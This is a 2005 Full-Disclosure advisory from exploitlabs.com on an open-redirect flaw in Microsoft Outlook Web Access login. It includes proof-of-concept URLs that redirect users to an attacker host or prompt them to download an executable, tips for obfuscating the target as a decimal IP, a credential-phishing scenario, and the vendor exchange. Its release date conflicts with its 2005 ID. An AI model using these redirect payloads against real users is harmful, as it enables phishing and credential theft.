------------------------------------------------------------
     - EXPL-A-2005-001 exploitlabs.com Advisory 030 -
------------------------------------------------------------
            - Microsoft Outlook Web Access -



OVERVIEW
========
A vulnerability in Microsoft Outlook Web Access allows malicious
attackers to redirect the login to any URL they wish.
This allows the attacker to force the user to the site of the
attackers choosing enabling the attacker to use social engenering
and phishing style of attacks.


AFFECTED PRODUCTS
=================
Microsoft Outlook Web Access ( OWA )
Windows 2003


DETAILS
=======
By using specialy crafted URL an attacker can cause the user
to redirected to an arbitrary URL to the end user.


ATTACK PROFILE
==============
An attacker could gather known user email address for a company
that uses OWA. By appending an obfuscated redirected url with a
encoded url such as

https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://3221234342/

this will take the user to http://example.com when the login box
is pressed, and a user is more likely to trust the url.
This would be used to send a link to the trusted login.
The attacker can then have a page to capture the user / password
and redirect back to the original login page or some other form of
phishing attack ( or other trusted URL attacks )


SOLUTION
========
Microsoft was contacted on Jan 20, 2005
NO patch has been produced to correct the vulnerability.
They have issued the following: on Jan 21, 2005
( see VENDOR RESPONSE )
This release is dated Jan 25, 2007


PROOF OF CONCEPT
================

1.https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost]

2.
https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost/file.exe]

click "login"


after injection into the form, the source reveals...

<BODY scroll="AUTO" bgColor="#3D5FA3" text="#000000" leftMargin=0
topMargin=0>
<FORM action="/exchweb/bin/auth/owaauth.dll" method="POST"
name="logonForm"
autocomplete="off">
<INPUT type="hidden" name="destination"
value="http://[otherhost/file.exe]">
<INPUT type="hidden" name="flags" value="0">
<TABLE id="borderTable" class="standardTable" cellSpacing=0
cellPadding=0
height="100%" width="100%" bgColor="#3D5FA3" border=0>

note:
the [otherhost] may easily be obfuscated so as to not alarm the targeted
user(s) such as
 https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://3221234342/
( http://example.com )


notes:
example 1 redirects the user to a url of the attackers choosing.
example 2 prompts the user to download an executable or other file.
 this could be used in conjunction with the aforementioned attack scenario.


CREDITS
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs.com

Donnie Werner
se_cur_ity@hotmail.com
morning_wood@zone-h.org
-- 
Web: http://exploitlabs.com
         http://zone-h.org



VENDOR RESPONSE
===============

researcher inital:
------------------
Dear Microsoft,
 The following discusses a potential security vulnerability affecting
one of your products. We are bringing it to your attention in order to
assist you in investigating it and determining the appropriate actions,
and have provided preliminary information about the potential
vulnerability below. Please read our disclosure policy, available at
http://www.exploitlabs.com/disclosure-policy.html if you have any
questions.
Please confirm using the contact information I have provided below that
you have received this note.

We look forward to working with you,

Exploitlabs Research Team

Donnie Werner
se_cur_ity@hotmail.com


vendor response 1
-----------------
Hello Donnie,

Thanks very much for contacting us. We have investigated reports of this
behavior in the past and plan to fix it in the next major release of
Exchange. Please let me know if you have further questions.

Thanks,
Christopher, CISSP


researcher initial 2
--------------------
Christopher,
when is the "next major release of Exchange" due?
I think it may be in the interest of admins to know this
flaw exists, and to possibly alert thier users of potential
phishing attacks and to help secure their systems.
Exchange 2003 OWA is used extensivly in corporate
environments, where this flaw will have the most impact
being this is a moderate remote threat, this researcher
feels that PUBLIC FULL DISCLOSURE is needed.
possibly MS would be willing to issue a statement to
the public regarding this issue at this time.

regards,

Donnie Werner ( no fancy letters )

vendor response 2
-----------------
(none)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html